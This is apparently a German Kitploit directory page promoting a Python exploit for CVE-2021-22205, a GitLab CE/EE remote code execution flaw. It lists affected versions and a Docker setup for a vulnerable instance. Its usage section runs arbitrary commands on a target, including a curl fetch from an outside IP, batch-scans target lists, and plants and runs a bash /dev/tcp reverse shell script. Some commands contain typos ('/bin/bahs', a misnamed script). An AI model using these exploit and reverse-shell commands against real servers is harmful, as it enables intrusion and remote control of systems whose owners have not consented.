Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-22205 — Python-Exploit für CVE-2021-22205, eine Schwachstelle zur Remote-Codeausführung in GitLab CE/EE. Unterstützt Einzelziel-Exploitation, Batch-Scanning und Reverse-Shell-Zustellung. | Kitploit
Tools/GitHubGitHub/devdanqtuan/cve-2021-22205
SchwachstellenscannerExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlRemote-Access-Tool
GitHubdevdanqtuan/cve-2021-22205

CVE-2021-22205

Python-Exploit für CVE-2021-22205, eine Schwachstelle zur Remote-Codeausführung in GitLab CE/EE. Unterstützt Einzelziel-Exploitation, Batch-Scanning und Reverse-Shell-Zustellung.

Repository anzeigen
13vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Auswirkung der Sicherheitslücke

In GitLab CE/EE wurde ein Problem entdeckt, das alle Versionen ab 11.9 betrifft. GitLab hat Bilddateien, die an einen Dateiparser übergeben wurden, nicht ordnungsgemäß validiert, was zu einer Remote-Codeausführung führte.

Betroffenes Produkt

  • Gitlab CE/EE < 13.10.3
  • Gitlab CE/EE < 13.9.6
  • Gitlab CE/EE < 13.8.8

Umgebung

root@kitploit:~
export GITLAB_HOME=/srv/gitlab

sudo docker run --detach \
  --hostname gitlab.example.com \
  --publish 443:443 --publish 80:80 \
  --name gitlab \
  --restart always \
  --volume $GITLAB_HOME/config:/etc/gitlab \
  --volume $GITLAB_HOME/logs:/var/log/gitlab \
  --volume $GITLAB_HOME/data:/var/opt/gitlab \
  gitlab/gitlab-ce:13.9.1-ce.0

Sicherheitslückenprüfung

Grundlegende Verwendung
root@kitploit:~
python3 CVE-2021-2205.py
Sicherheitslückenprüfung
root@kitploit:~
python3 CVE-2021-2205.py -v true -t http://gitlab.example.com
Befehlsausführung
root@kitploit:~
python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "curl http://192.168.59.1:1234/1.txt"
root@kitploit:~
python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "echo 'Attacked!!!' > /tmp/1.txt"
Stapelscan
root@kitploit:~
python3 CVE-2021-2205.py -s true -f target.txt
Reverse Shell
root@kitploit:~
python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "echo 'bash -i >& /dev/tcp/ip/port 0>&1' > /tmp/1.sh"
root@kitploit:~
python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "chmod +x /tmp/1.sh"
root@kitploit:~
python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "/bin/bahs /tmp/1.sh"

Referenz

https://devcraft.io/2021/05/04/exiftool-arbitrary-code-execution-cve-2021-22204.html

Tool herunterladen